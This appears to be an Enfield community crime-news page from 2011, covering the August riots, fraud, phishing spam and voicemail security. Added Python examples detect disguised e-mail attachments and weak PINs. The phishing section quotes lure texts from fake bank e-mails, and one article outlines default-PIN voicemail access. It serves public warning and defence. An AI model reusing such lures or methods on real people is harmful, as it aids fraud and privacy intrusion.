The unit provides the police service with a pool of experts who carry out initial assessments of terrorist and violent extremist material on the internet.

It is also responsible for alerting forces, Counter Terrorism Units/Counter Terrorism Intelligence Units and the Metropolitan Police Service Counter Terrorism Command to online terrorist offences that may fall within their jurisdiction.

The CTIRU also has a national responsibility for serving any Section 3 Terrorism Act notices within the UK and focuses on developing and maintaining relationships with the internet industry and also forging links with key international partners.

Chief Superintendent Gwyn Thomas said: "Whilst the internet makes a positive contribution to most people's lives on a daily basis it can and is used by criminals and terrorists.

"Policing within the environment of the internet is a relatively new area but we are aiming to make it more hostile for people who use it for criminal purposes.

"The CTIRU is focused on material that is used for terrorist purposes or to promote extremist messages that radicalise vulnerable people.

"A lot of what is referred to us by the public may not breach the law; however, we are best placed to conduct that assessment and it's important that we know the scale and range of material available to the public.

"It may not always be possible to remove referred content due to the global nature of the internet, it is therefore important that the international policing community works together on these issues."

Referrals can be made directly to the CTIRU from the police or agencies or there is an anonymous referral system for members of the public at www.direct.gov.uk/reportingonlineterrorism.

Ch Supt Thomas added: "We would urge officers to refer sites through their Special Branches who will link into the CTIRU. "In addition you can contact the CTIRU directly for advice and information regarding terrorism content on the internet."

The CTIRU can be contacted at CTIRU@acpo.pnn.police.uk

(18th August 2011)


 

CLAIMS FOR COMPENSATION UNDER THE RIOT DAMAGES ACT 1886
(MPA website, modified)

If you've suffered loss or damage as a result of the recent riots you may be able to claim compensation.

Under the Riot (Damages) Act 1886, your local Police Authority is liable to pay for damage to buildings and their contents which has occurred in the course of a riot. The Act provides for compensation to be paid for losses through injury, destruction or stealing, to houses, shops and other buildings or their contents caused by any person involved in a riot. Claims will be assessed in accordance with the legal definition of a riot.

The Act does not include damage to or theft of a vehicle unless that vehicle was housed within a building. It also excludes personal injuries and compensation for non-material losses, such as interruption to trading. No costs will be allowed to any person claiming.

The Act applies to both insured and uninsured members of the public as well as insured and uninsured businesses.

For the claim form and details of how to claim go to the following websites :

Metropolitan Police : www.mpa.gov.uk/work/compensation/

UK Government website : www.direct.gov.uk/en/Nl1/Newsroom/DG_198958

(17th August 2011)



PROUD TO BE A LONDONER
(Courtesy of Andy Love, MP Edmonton, 12th August 2011)

 

The violence that unfolded across the capital and beyond was shocking to say the least.  It was truly saddening to see widespread disgraceful criminal behaviour taking place on our streets.  There can be no excuses for it.

I have been keeping in close contact with Enfield's police commander and I know just how hard the police are working to keep people safe and to protect their businesses and homes.  We continue to need the strongest possible police response so as not to undermine the calm and security that has been restored to our streets.  There must be no 'no-go' areas for the police.

It must be remembered that this criminality was carried out by a small majority of our community.  They will not go unpunished.  The priority now is taking the action that will end the sense of fear many families are feeling.  Adequately reprimanding those involved will go some way to achieving this.

It is also vital that there is a rapid response to help those communities hit hardest by these riots to get back on their feet as quickly as possible.  Public safety is imperative but we also need immediate and focussed help for those people who have lost homes and businesses.  This includes insurance companies fast-tracking claims so that things can be put right at the earliest opportunity, as well as targeted financial support for the most affected councils.

I will be working to ensure that victims of this inexcusable violence are not left to cope alone.  Our community is vitally important to us and it is positive to see that it has been strengthened, not weakened, by the mindless rioting.  There is no shame in still being proud to be a Londoner.

Andy can be found at :

www.andylovemp.com

www.andylovemp.blogspot.com

E-mail : andylovemp@aol.com

(12th August 2011)


 

A BETTER MAN THAN ME

On the evening of Tuesday 9th August 2011 in Birmingham three young men died whilst trying to protect their community. They were standing on Dudley Road near a petrol station when a speeding car allegedly swerved into them deliberately.

How would you react ? I am quite sure that I would not act as honourably as this man.


FATHER'S PLEA FOR RESTRAINT - Mr Tariq Jahan

MY SON Haroon was 21 years old and a good lad. Everybody in the community knew him. All the street were out and basically he was looking out for the whole community.

He stood up for the community and unfortunately last night was killed with two of his friends. He was defending his community and people round here. They smashed into the petrol station and the social club.

Because he was a young chap he was inclined to join all the locals round here, everyone was out on the corner and car came out of nowhere for God knows what reason.

I didn't see it with my own eyes I was round the corner...I heard the car coming at high speed. I heard the thud, ran round and I saw three people on the ground.

My instinct was to help the three people. I didn't know who they were or if they'd been injured. I was helping the first man and someone came up behind me and told me my son was lying behind me. So I started CPR on my own son, my face was covered in blood, my hands were covered in blood.

The guy who killed him drove directly into the crowd and killed three innocent guys. Why? What was the point of doing that ? I don't understand.

They were defending the community from all the problems going on around the country. He was trying to help his community.

He was a good lad. He was very, very intelligent, very smart.

He was the youngest, and anything I ever wanted done, I would always ask Haroon to sort it out for me.

He was a good kid, everyone knew him and loved him. I can't describe to anyone what it feels like to lose your son, I miss him dearly but two days from now the whole world will forget - no one will care.

I don't blame the Government, I don't blame the police, I don't blame anybody.

I'm a Muslim. I believe in divine fate and destiny, and it was his destiny and fate, and now he's gone.

And may Allah forgive him and bless him.

Tensions are already high in the area. It's already bad enough what we are seeing on the streets without other people taking the law into their own hands.

My family wants time to grieve for my son. People should let the law deal with this.

Today we stand here to plead with all the youth to remain calm, for our communities to stand united.

This is not a race issue. The family has received messages of sympathy and support from all parts of society.

I lost my son.
Blacks, Asians, Whites - we all live in the same community.
Why do we have to kill one another ?
Why are we doing this ?

Step forward if you want to lose your sons.

Otherwise, calm down and go home - please.

(12th August 2011)



 

WE CANNOT ALLOW THESE CRIMINALS TO TAKE CONTROL OF OUR NEIGHBOURHOODS
(Courtesy of Nick de Bois MP Enfield North, 9th August 2011)
www.nickdebois.com  [Note 1]

The dreadful scenes in Enfield on Sunday night and last night have been truly disgraceful.

I was in Enfield Town from about 6pm on Sunday evening. The scenes that residents and I witnessed of people with their faces covered intent on attacking the police and local shops were as shocking as they were surprising.

The vast majority of these people were not from Enfield. This was organised criminal activity. People had come from other parts of London and elsewhere after being co-ordinated via social media and mobile phone. The police acted in a controlled and very professional manner which dispersed a large crowd of people, making many arrests.

It was telling that vandals fleeing from the police would run back through side streets to get into their souped-up cars and leave to meet up elsewhere.

It is difficult to see how anyone could argue this was some kind of uprising from a frustrated, deprived underclass. That people have gone out to commit criminal acts on an organised day to capitalise on those awful events at the weekend is deplorable.

It has now also been reported by the Enfield Independent that the fire at the large Sony distribution warehouse in Enfield Lock was started by teenagers with petrol cans. It is beyond belief.

I want to pay tribute to the bravery and professionalism of the police, who did and will no doubt continue to do a superb job in minimising the damage to our neighbourhoods. Given the scenes we have witnessed in other parts of London since Sunday, it is clear things could have been a lot worse.

There have so far been over 450 arrests and I am adamant that anyone convicted of the crimes committed in the past few days must be given custodial sentences. Given the way our police force is clearly over-stretched and struggling to contend with the unprecedented levels of violence, I have called publicly for the Government to bring in the military to protect our fire services so they can deal with burning buildings without fear of attack, and for water cannon to be made available.

The Metropolitan Police have launched Operation Withern to investigate the disorder and violence across London.

An incident room has been set up and I have been advised that anyone with information should call the Major Investigation Team on 020 8345 4142. The long arm of the law must reach those responsible for these appalling acts.

Editor's Note : An offer has been made to publish comments on these current events from other Politicians from the London Borough of Enfield.

(12th August 2011)


 

NO EXCUSE

You may have watched Sky News on Sunday evening. There was a scene of some thugs kicking at the door of a local Enfield pharmacy. The shop has been there for approaching 20 years with the same proprietor, as a local resident you may have received some advice from him. He is part of this community. When those thugs were kicking in his store, did you notice that there was someone inside trying to keep those doors shut ?

Then there are the residents living near to or on Church Street. They must have been living in fear for their lives after seeing what had happened in Tottenham the night before.

Insurance is not going to cover some of the damage that has been done. Some of these businesses are so big they cover themselves. The end result is that the prices go up, a penny here a penny there. So we all end up paying for what has been damaged or stolen. Ironically even the thugs and thieves!

Then there are the small businesses. Everybody is suffering financially at the moment one way or another. Getting a window replaced can cost hundreds in excess payments alone in addition to the insurance cover. Money that these small businesses haven't got. Then there will be the increase in insurance premiums for the following year and the stipulation that shutters must be installed at further cost. The end result will be a loss of more jobs.

Then there are the aesthetics. How many people, after having a drink or evening meal, wander down a high street window shopping? Those windows will now be replaced by steel shutters.

The Damage ( level of theft unknown )

Church Street

- Golden Mantella, Jeweller - shop front wrecked
- Pearsons - 2 windows broken
- Starbucks - front wrecked
- T Mobile - one side of shop window broken
- HMV - demolished frontage
- Maplin - windows damaged (since 10th August 2011)

Silver Street

- Cooperative Pharmacy - Front door and windows broken
- Bath Store - all windows broken
- Doctors Surgery - windows broken
- Nicon House ( building to let ) - all windows broken

Chase Side

- HiFi shop - window alongside the entrance door

Southbury Road

- Healthcare Pharmacy - shuttering damaged, front door and windows smashed
- Empty shop, formerly sandwich bar - Windows smashed
- Betting office - windows smashed
- Picture framing shop - window smashed
- Doctors Surgery front window broken
- Plaster mouldings shop near George Spicer School - windows broken

De Mandville Retail Park

- Morrisons - windows broken
- PC World - Inside glass door broken
- Argos - Front doors and window broken

A10 Retail park

- Sainsbury's Supermarket - Front door and windows broken
- Comet electrical store - Front door and windows broken
- JB Sport - Front door and windows broken
- Sports Direct - Front door and windows broken
- Currys electrical store - Front door and windows broken
- Krispy Kreme (donut store) - side windows broken (since 10th August)

Ponders End / Southbury Road

- Tesco - Windows broken

Lack of Management

Independent of the shooting that occurred in Tottenham, there has been much criticism of the Police since. The poor Police on the ground did what they could, but they were few. 1600 for the whole of London!  I think that the main problem has been with their senior management. Last night they swamped London with 16,000 Police. Then funnily enough it was quieter (please excuse my sarcasm).

Statistically the London Mayor has stated that there are more Police in London than there have ever been ( around 30,000 heads and falling ), but to be able to raise the numbers they had last night, and indeed on previous nights, they had to borrow officers from surrounding counties. It appears that the majority of the injuries that have occurred have been to the Police themselves and this was probably down to their initial low numbers.

On Sky News this morning a former senior police officer was asked: what can be done to control events like these? One of his responses was "let's hope that it rains"!

Will there now be a rethink into Police numbers ? Or will it be more CCTV cameras and massaged statistics ?

(10th August 2011)


 

HARRY POTTER HIT BY HI-TECH CONMEN
(BBC News, dated 5th August)

Cyber conmen are cashing in on interest surrounding the Pottermore website.

Through Pottermore, JK Rowling will release more stories and background from the world of Harry Potter. Pottermore officially opens in October, and scammers are selling fake accounts for the site that claim to give fans early access.

They are also using search engine poisoning to direct Potter fans to sites that are seeded with viruses and other malicious programs.

Discovered by veteran security researcher Chris Boyd, the scams largely revolve around early access to the Pottermore website.
The public at large will be able to sign up in October but early, or beta, access is being granted to people before then if they are among the fastest to complete a magical quill challenge on the Pottermore site.

The challenge runs every day from 31 July to 6 August and about one million beta accounts will be given away.

Scammers are now offering to register people for this challenge and are getting hold of their personal details as a result. Also, Mr Boyd discovered, some scammers are supposedly selling Pottermore accounts for about $100 (£60) via eBay.

While many of these are likely to be fake, some are being offered by fans who have set up more than one account for Pottermore.

The administrators of the Pottermore website have noticed the trade in accounts and have issued a warning about the practice.

In a blog post, the Pottermore administrators said buying and selling accounts was "expressly prohibited" in the terms and conditions. Also, it added, signing up with a view to selling an account "deprives genuine fans the chance to gain early access".

It added: "We have the right to terminate any Pottermore accounts that are sold online."

Videos of people successfully signing up to Pottermore are being posted on YouTube but, found Mr Boyd, many lead to surveys tied to affiliate marketing schemes. Those who fill in the surveys get the offer of a download as a reward that is often found to be full of malware or adware.

Scammers are also starting to poison search engine results associated with Pottermore to direct people to sites loaded with malicious programs.

One site found by Mr Boyd is known to have harboured fake security software that claims to find viruses on a PC and asks for cash to clean up the non-existent problem.

(10th August 2011)


 

5000 ARRESTED IN OPERATION TARGET
(Courtesy of: Metropolitan Police, dated 29th July 2011)

The operation, which was launched on Wednesday 8 June, is tackling crime against people and property, and aims to achieve significant long term reductions in robbery, burglary and violent crime.

5,187 people have been arrested to date for firearms, robbery, burglary and other offences since the operation began. More than 1,500 officers from across the MPS have been involved in a sustained campaign of overt and covert operations, including increased patrols and proactive investigations to pursue suspects. 19 people were arrested on Monday night alone in five separate operations in Westminster.

Assistant Commissioner Ian McPherson, head of MPS Territorial Policing, said: "5,000 arrests shows the Met's commitment, through Operation Target to deal with the issues that matter to local communities.

"By bringing together borough based knowledge and expertise with the skills of our specialist units we will make a real and sustainable difference, allowing people to go about their daily lives feeling more safe and confident.

"Thousands of suspects have been arrested; suspected stolen property has been recovered; and drugs and weapons have been removed from the streets.

"While overall crime continues to fall - and is at its lowest in ten years - we have seen recent increases in robbery and burglary which we are determined to tackle. However, street robbery and burglary are still relatively far lower than previous years including 2006 when robbery was at peak levels.

"Our concerted actions in the Operation Target areas has seen reductions in overall crime and violence, while I'm pleased to report we have now stopped the increases in robbery and burglary in those areas. Over the next few weeks and months we will be working tirelessly to turn the corner and bring these offences down further - not only in the Operation Target areas, but across the whole of London and we will use our resources most effectively in the places that are affected most."

The main factors for this year's increase are a 92% increase in the theft of mobile phones and an increase in robbery of gold where thieves are targeting necklaces in particular and selling the jewellery on for cash through the second hand market.

Police have been working with external partners to close down disreputable businesses and venues such as pawn shops, licensed premises, and crack houses - places which attract or generate crime and anti-social behaviour. The MPS has also been working with the mobile phone industry to see how technology and software can help reduce street crime.

"The public can support this operation and help themselves from becoming a victim of crime by taking some basic prevention measures, for example, when out, where possible try to keep any valuables hidden. Smart phones and media players are becoming must-have items for criminals who see these items as cash.

"Many robberies happen when people check their phones just after leaving a bus or tube or when they are distracted. For more information or advice on how to keep safe visit met.police.uk/crimeprevention

"Delivering on Operation Target is a key priority for the MPS as it is tackling the crimes that significantly impact on local communities and their confidence in us to help keep them safe.

"I can reassure Londoners that we will keep on relentlessly pursuing robbers, burglars and other criminals and bring them to justice to help keep London's communities safe."

(10th August 2011)


 

INSURANCE FRAUD LEVELS SOAR
(The Guardian, dated 28th July 2011)
www.guardian.co.uk  [Note 1]

Insurers uncovered 133,000 fraudulent insurance claims worth £919m in 2010, meaning the public registered 2,500 fake claims every week - a rise of 9% on 2009, according to figures from the Association of British Insurers.

It said the number and value of detected insurance frauds had risen by more than 100% over the past five years.

Fraudulent claims cost the insurance industry an estimated £2bn a year, adding an average £44 a year to the insurance bill for every UK policyholder.

The scale of the problem has provoked insurers to set up an insurance fraud register early next year, which will contain details of insurance cheats.

The most common frauds involved home insurance with 66,000 bogus or exaggerated claims discovered by insurers, followed by 40,000 dishonest motor insurance claims. Motor frauds were the most costly, totalling £466m.

The ABI said one claim for back injuries sustained from a fall while working in a nightclub was rejected when Facebook images showed the claimant performing gymnastics and training for a charity run.

A woman's claim for facial injuries she said resulted from a falling toilet roll holder in a fast food outlet was rejected when it was shown that the holder would have had to have fallen upwards to cause the injury.

A claim for injury said to be caused by falling over a wall was rejected when it was proved that there was no wall at the scene of the alleged incident.

Nick Starling, the ABI's director of general insurance and health, said: "Fraudsters continually look for new ways to con insurers, so we are upping our game. Early next year, we will be setting up a national insurance fraud register, which will contain details of all known insurance cheats.

"And at the same time the first ever national police insurance fraud investigation unit will begin its operations, making it harder than ever to commit insurance fraud."

Glen Marr, director of the Insurance Fraud Bureau said the organisation wanted consumers to report anyone they suspected of committing insurance fraud via its Cheatline: "At the IFB, we have access to a significant volume of industry data, use sophisticated and powerful analytical software, work in partnership with insurers, law enforcement and regulators, and have no shortage of reports being received from consumers of their knowledge or suspicions of those concerned with defrauding the industry, through our Cheatline facility.

"It's important to underline that some of those concerned with insurance fraud are also involved in criminal activities where there is harm to local communities."

(10th August 2011)


 

CITY POLICE TARGET NEW BRITISH FRAUD MODUS OPERANDI
(City of London Police, dated 24th June 2011)

Omar Eshpari, 30, from Enfield, North London, Dean Straker, 32, from St Albans, Hertfordshire, Stefan Mitchell, 41, from Coulsdon, Surrey, and Derial White, 26, from London, were all charged with conspiracy to defraud before being released on bail.

The charges follow enquiries conducted into Pemberton International Ltd, Eldon International Ltd, Willow International Ltd and Allied Investment Management Ltd.

It is believed the activities of these companies, surrounding investments in land, resulted in losses of millions of pounds to UK investors, with the land being apparently misrepresented in both its potential use and its ownership when sold.

'Land banking' fraud is an emerging phenomenon where genuine investors are duped into purchasing plots of worthless land.

It was recently estimated to be worth at least £200 million, and City of London Police is currently conducting a number of criminal investigations across the country.

Commissioner of the City of London Police, Adrian Leppard, said: "Land is a tangible asset and is increasingly viewed as a safer place to invest than stocks and shares.

"Unfortunately organised crime gangs appear to be wise to this and are now targeting people across the UK, especially the elderly and vulnerable, with cold calls offering bogus investments.

"These criminal charges are an important landmark and emphasise how tackling 'land banking' fraud is now a major priority for the City of London Police."

Luke Dockwray, reviewing lawyer in the CPS Central Fraud Group, said: "This is the first time the Crown Prosecution Service has brought a prosecution for a 'land banking' fraud. The evidence we have suggests that these defendants sold land to investors by falsely representing that the land was suitable for future development and offered real investment opportunity.

"I considered over 16,000 pages of evidence gathered by the City of London Police during their investigation. Having reviewed that material, I have concluded that there is sufficient evidence for a realistic prospect of conviction, and that it is in the public interest to charge Omar Eshpari, Stefan Mitchell, Dean Straker and Derial White with conspiracy to defraud their investors."

(10th August 2011)


 

BEWARE OF "WRONG TRANSACTION" HOTEL SPAM
(IDG, dated 27th July 2011 author Robert McMillan)
www.idg.com   [Note 1]

If you get an email message telling you a hotel has erroneously charged your credit card account, be careful. The odds are that it's part of a new spam campaign that could infect your computer.

The messages started popping up in recent days and there are already hundreds of variants on the same theme: A hotel wrongly charged a credit card number and the victim is supposed to fill out an attached form to process the refund.

"Please see the attached form. You need to fill it out and contact your bank for return of funds," read one such message, titled "Hotel Breakers Palm Beach made wrong transaction."

The 'refund' form is actually a malicious Trojan horse program that installs fake antivirus software on the victim's computer, according to Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham.

His group, which maintains a massive real-time database of spam messages, has received more than 800 copies of the spam. That's not a lot of messages, but the campaign is still new.

The messages seem to be coming from the same botnet of infected computers that recently sent out similar messages warning victims that their credit card payments were overdue. Those messages led to the fake antivirus downloads too, Warner wrote in his blog post.

It's standard operating procedure for spammers to alter their messages now and then to trick new victims. But any unsolicited message that includes an attachment should always be treated as suspicious.

Editor's Note

It appears that only hotels in the USA are being quoted at the moment, but you can guarantee that it won't be long before the UK and European hotel chains will be quoted. The current hotel chains that these bogus e-mails mention are:

- Renaissance
- Hyatt Regency
- Sheraton
- Westin
- Hilton
- Intercontinental

(29th July 2011)


 

MORE NEWS FROM MY SPAM INBOX ! - JULY 2011
Category : phishing

My Internet Service Provider's (ISP) spam filter has continued to do a very good job. The last 2 weeks have been very busy with online fraud as it has managed to filter out 13 phishing e-mails and place them in a "be warned" post box.

The latest batch of phishing e-mails include :

HALIFAX BANK - Nine e-mails have been received with three variations of the originator's name: "Halifax Bank", "Halifax Bank Plc" and "Halifax - Internet Banking". The following are examples of the attached messages:

Dear Customer,

Access to your account has been suspended !! To re-gain access, Please follow the link below
providing the required security informations.

Dear Customer,

The "Halifax - Internet Banking" message had an attachment and the following message :

Reinstate your Halifax Online Banking Accounts. kindly proceed via the Halifax secure access page via attachment.

SANTANDER - A request to re-enter my personal information as they have had problems with their internal servers. Click on provided link.

POST EXPRESS OFFICE (e-mail address quoted as postmail-US) - e-mail states that a parcel for me is awaiting collection, but I need to click on the attached document for package reference number.

IRS ( US Tax office - I am not in US ) - Entitled "Rejected Federal Tax transfer". For further information of transactions failure, click on pdf document. The attached document was labelled with the letters "pdf" in the title, but it was a .exe file. This means that the file is executable and would probably load some nasty things onto your computer.

LLOYDS TSB - e-mail stating that account had been accessed from an un-authorized location and that bank account had been deactivated. Click on link to reactivate.

ALLIANCE AND LEICESTER - An e-mail stating that if I click on the attached link and entered all of my personal details I would be guaranteed to receive a full reimbursement of any monetary loss in the future!

All of these e-mails are bogus and are just phishing for your personal information. If you receive them, delete them immediately and do not CLICK on any link or open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number; DO NOT use contact details within these bogus e-mails.
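
A mail filter can catch the trick described in the IRS entry above, where the file name says "pdf" but the file is really a .exe. The following Python code is an added example, not part of the original article or of any ISP's filter; the message, addresses, file names and function names are constructed for illustration, and it also looks at the first bytes of each attachment, which goes a little beyond the file-name check described in the text.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Extensions Windows will run when double-clicked (not an exhaustive list).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Document-type words that make a file name look harmless.
DOCUMENT_HINTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "txt"}


def split_ext(filename):
    """Return (stem, ext) with ext lower-cased; trailing dots/spaces ignored."""
    name = filename.strip().rstrip(". ")
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem:
        return name, ""
    return stem, "." + ext.lower()


def check_attachment(filename, content_type, payload):
    """Return a list of reasons why this attachment looks deceptive."""
    reasons = []
    stem, ext = split_ext(filename)
    if ext in EXECUTABLE_EXTS:
        reasons.append("executable extension " + ext)
        # Words such as 'pdf' in the rest of the name disguise the real type.
        tokens = set(re.split(r"[^a-z0-9]+", stem.lower()))
        hints = sorted(tokens & DOCUMENT_HINTS)
        if hints:
            reasons.append("name claims to be " + "/".join(hints))
    # Windows programs start with the bytes 'MZ' whatever the name says.
    if payload[:2] == b"MZ" and ext not in EXECUTABLE_EXTS:
        reasons.append("Windows program content behind a "
                       + (ext or "missing") + " extension")
    if content_type == "application/pdf" and payload[:5] != b"%PDF-":
        reasons.append("declared as PDF but content is not a PDF")
    return reasons


def scan_message(raw):
    """Parse a raw e-mail and return {attachment name: [reasons]}."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        reasons = check_attachment(name, part.get_content_type(), payload)
        if reasons:
            findings[name] = reasons
    return findings


def build_sample():
    """Constructed test message; the attachments are harmless filler bytes."""
    fake_program = b"MZ\x90\x00" + b"\x00" * 60
    msg = EmailMessage()
    msg["Subject"] = "Rejected Federal Tax transfer"
    msg["From"] = "sender@example.invalid"
    msg["To"] = "reader@example.invalid"
    msg.set_content("For further information, see the attached pdf document.")
    msg.add_attachment(fake_program, maintype="application",
                       subtype="octet-stream", filename="tax_transfer_pdf.exe")
    msg.add_attachment(fake_program, maintype="application",
                       subtype="pdf", filename="refund_form.pdf")
    msg.add_attachment(b"%PDF-1.4\n%%EOF\n", maintype="application",
                       subtype="pdf", filename="statement.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reasons in scan_message(build_sample()).items():
        print(name, "->", "; ".join(reasons))
```
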

(25th July 2011)


 

PREVENT VOICEMAIL HACKING

Currently there is a lot going on about mobile phone hacking. But using the word "hacking" implies some form of devious technical wizardry to "break in" to people's voicemail. This also implies that there is nothing that we mere mortals can do to prevent the evil deed from occurring. The thing is, it is relatively easy to reduce the likelihood of having your privacy put in jeopardy. We have heard so much about the people who have committed the crime, but nothing about any security lapses of the mobile phone companies. That is because they are not at fault. In fact every mobile phone company has instructions on their websites (and probably in the paper manuals that come with each and every mobile phone).

The instructions are quite simple; they are the instructions for setting the Voicemail PIN.

When you purchase a mobile phone, you probably check that it can receive calls, make calls, use an App, load an App, surf the internet, and lastly pick up Voicemail messages. You may even activate the phone's password facility to prevent unauthorised use; THIS IS NOT THE VOICEMAIL PIN.

When you press the correct button or enter the code for voicemail, the mobile operator's system will recognise your phone number and connect you to your personal messages automatically.

The thing is, the mobile phone operators also provide the facility where you can access your Voicemail messages remotely from a normal landline or another mobile. To access your Voicemail using this facility you simply call your mobile company's voicemail access number (either a landline or mobile telephone number), type in your own mobile number followed by your PIN. Now this is the problem, the PIN ( if not altered ) is set to a default number. The default PIN varies between mobile phone operators, but every mobile phone working on their system will have the same default PIN. Unless changed by you !

In some cases you don't even need to do what I have described. Some mobile service providers simply allow you to dial your mobile number, when you get diverted to voicemail you press #, followed by your PIN ( which could be the default number ) and hey-presto you can listen to your messages.

It is this facility that criminals have probably been using to access people's Voicemail. Many mobile phone network companies have now changed the voicemail security, but some haven't.

SO PERSONALISE YOUR VOICEMAIL PIN, NOW !

Recommendation

Set up your Voicemail PIN as soon as you receive your phone or SIM card. Here are a few hints and tips to keep in mind when setting your PIN number.

- When choosing a PIN number make sure it is memorable but not too obvious.
- Avoid numbers like 0000, 1111 or 1234.
- DO NOT use your date of birth.
- Never share your PIN number with anyone.
- If you suspect someone knows your PIN number, change it immediately.
- Ideally avoid writing your PIN number down. If you do, keep it at home and in a safe place.
- DO NOT USE YOUR BANKING PIN NUMBER
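
The hints above can be applied automatically when a new voicemail PIN is chosen. The following Python code is an added example, not any mobile operator's own check; the function names, the 4 to 10 digit length limit, the date-of-birth formats and the sample default PIN in the test values are assumptions made for illustration, since real defaults vary between operators.

```python
from datetime import date


def dob_candidates(dob):
    """Common ways of writing a date of birth as a run of digits."""
    dd, mm = f"{dob.day:02d}", f"{dob.month:02d}"
    yyyy = f"{dob.year:04d}"
    yy = yyyy[2:]
    return {
        dd + mm, mm + dd, yyyy, mm + yy,
        dd + mm + yy, mm + dd + yy, yy + mm + dd,
        dd + mm + yyyy, mm + dd + yyyy, yyyy + mm + dd,
    }


def check_voicemail_pin(pin, dob=None, default_pins=frozenset()):
    """Return the reasons a proposed PIN is weak; an empty list means it passes.

    default_pins is whatever the operator ships as its factory setting
    (assumption: supplied by the caller, because it differs per network).
    """
    # Assumption: PINs are 4 to 10 ASCII digits.
    if not (pin.isascii() and pin.isdigit() and 4 <= len(pin) <= 10):
        return ["PIN must be 4 to 10 digits"]

    reasons = []
    if pin in default_pins:
        reasons.append("operator default PIN")

    # A string built from a shorter repeated block (1111, 1212, 123123)
    # always reappears inside itself doubled with both ends trimmed.
    if pin in (pin + pin)[1:-1]:
        reasons.append("repeated digit pattern")

    # Every neighbouring pair goes up by one (1234, 7890) or down by
    # one (4321, 2109), counting 9 -> 0 and 0 -> 9 as a single step.
    steps = {(int(b) - int(a)) % 10 for a, b in zip(pin, pin[1:])}
    if steps in ({1}, {9}):
        reasons.append("run of consecutive digits")

    if dob is not None and pin in dob_candidates(dob):
        reasons.append("derived from date of birth")

    return reasons


if __name__ == "__main__":
    # Constructed sample values.
    birthday = date(1970, 8, 25)
    for candidate in ["0000", "1111", "1234", "1212", "2508", "1970", "7394"]:
        problems = check_voicemail_pin(candidate, birthday, {"0000"})
        print(candidate, "->", ", ".join(problems) or "acceptable")
```
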

(25th July 2011)


 

IT'S EUROPE JIM, BUT NOT AS WE KNOW IT !

I may have given this article a light-hearted title and this probably belittles the seriousness of the situation that I encountered, but never mind.

Living within the UK we are probably victims of surveillance of some shape or form every day through CCTV. According to The Independent (2nd November 2006), "There are an estimated 4.2 million CCTV cameras in Britain: one for every 14 people". Do we take any notice? Not really; the only ones we may pay attention to are speed cameras.

Then there are some cultural differences on how we (in the UK) react to crime and the law. This time last year I was travelling around Brussels and virtually every other bus had an advert on it warning parents to protect their children against paedophiles. The warning is a great idea, but I didn't know that Belgium had such a problem !

What about a simple thing like crossing the road ! You are late for your train, the road is clear and you ignore the little red man at the pedestrian crossing and cross the road. Not in Atlanta, Georgia you don't. A couple of years ago a Spanish Historian who was a guest speaker at a conference at the Atlanta Convention Centre was "aggressively arrested" (a couple of cracked ribs and bruises paid testament to that) when he continued to jay-walk after being advised not to do so by a plain-clothed Police Officer.

So back to the main story. Having visited Budapest before I was aware of most of the country's cultural niceties and its social situation. It is a great place to visit, lots to see, friendly people; but I was not expecting what I experienced.

I will begin with some translation :

Hid = bridge
Ter = Square
Utca / Ut = Road or street
Rakpart = quay

I was travelling with my Wife and we stayed at the Kempinski Hotel within the city centre adjacent to the British Embassy. There were several EU meetings during the time of our visit and many EU Diplomats and politicians stayed in our hotel. This accounted for a high level of security in and around our hotel.

As a tourist we travelled around the city visiting art galleries, museums and tourist sites. Some of my visits were stimulated by articles that I had read in the English language "Budapest Times". One such article was about Freedom Square (Szabadsag Ter). The article mentioned that the Square housed one of the final monuments of Soviet domination and that the Square may be renamed as Roosevelt Square in the future. There was also a hint within the article that the monument could be moved to another site due to its links with the former communist regime. The monument also had a large gold Soviet Star at its head, a symbol that for all other causes had been outlawed in Hungary for almost 20 years. The name change would also offer a better association with one of its inhabitants, the US Embassy.

On the penultimate day of our stay I decided that I was going to walk alone around the city centre and take photographs of places of interest. So my morning route was from my hotel to St Stephen's Basilica, Freedom Square and then the Holocaust Memorial on the Danube. Being conscious of the US Embassy being adjacent to the Soviet Memorial I was wary that I should not point my camera in that direction. I then walked towards the Danube down Zoltan Utca, for the Holocaust Memorial.

On reaching Szechenyi Rakpart I realised I could not reach the Holocaust Memorial due to the fast heavy traffic. So I walked towards the Chain Bridge and a road crossing. This was a distance of 400 metres approx. As I approached the Chain Bridge road crossing I was conscious of two people alongside me (a bearded man in a blue rain coat and a younger man with a laptop case). The Bearded man walked to the nearby Number 2 tram stop (this is raised approximately 4 metres above the Danube bank and provides a good viewing platform towards the memorial); Laptop man walked either adjacent or behind me to the Pest bank of the Danube. To check what was going on I walked about 50 metres along the bank from the Chain Bridge and stopped; the person (Laptop man) following me walked a further 10 metres and stopped. I took some photos of the Buda side and the Chain Bridge then retraced my steps to the Chain Bridge and took some close-up photographs of the bridge. Laptop man also retraced his steps and stopped 10 metres from me. After 5 minutes I then returned to my original walk towards the Holocaust Memorial. At this stage Laptop man froze and stared at me as I walked by. I continued my walk as Laptop man walked to the Tram stop and talked to the Bearded man (by this time he had removed his coat). Laptop man then returned to the bank of the Danube near where I took my photographs and took a seat. During this period three tram 2's passed, but Bearded man did not board. When I reached the Holocaust Memorial I took my photographs and returned towards the Chain Bridge crossing. The Bearded man was still at the tram stop; by this time at least another two trams had passed in either direction. As I approached the bridge, Laptop man stood up and walked away from me. The Bearded man seemed to make a big thing about putting his coat on, shaking it as he did so.

I got on the same tram as the Bearded man in the direction of Lagymanyosi Hid, but he got off the tram after only one stop ( outside the Marriott Hotel ).

I took my first photograph within Freedom Square at 09.21 (local). I took photographs of the Bearded Man and Laptop Man at 10.03 (local) prior to boarding the tram. So I was being followed for almost 40 minutes. I continued my sightseeing for the remainder of the day without any further apparent scrutiny.

Weird or what ? I raised this story as an issue with my local MP. My concern was as to whether this incident ( if it can be described as that ) was either State surveillance or criminal activity. His written response in short was that he could not comment on another nation's security measures; and in all honesty he couldn't really.

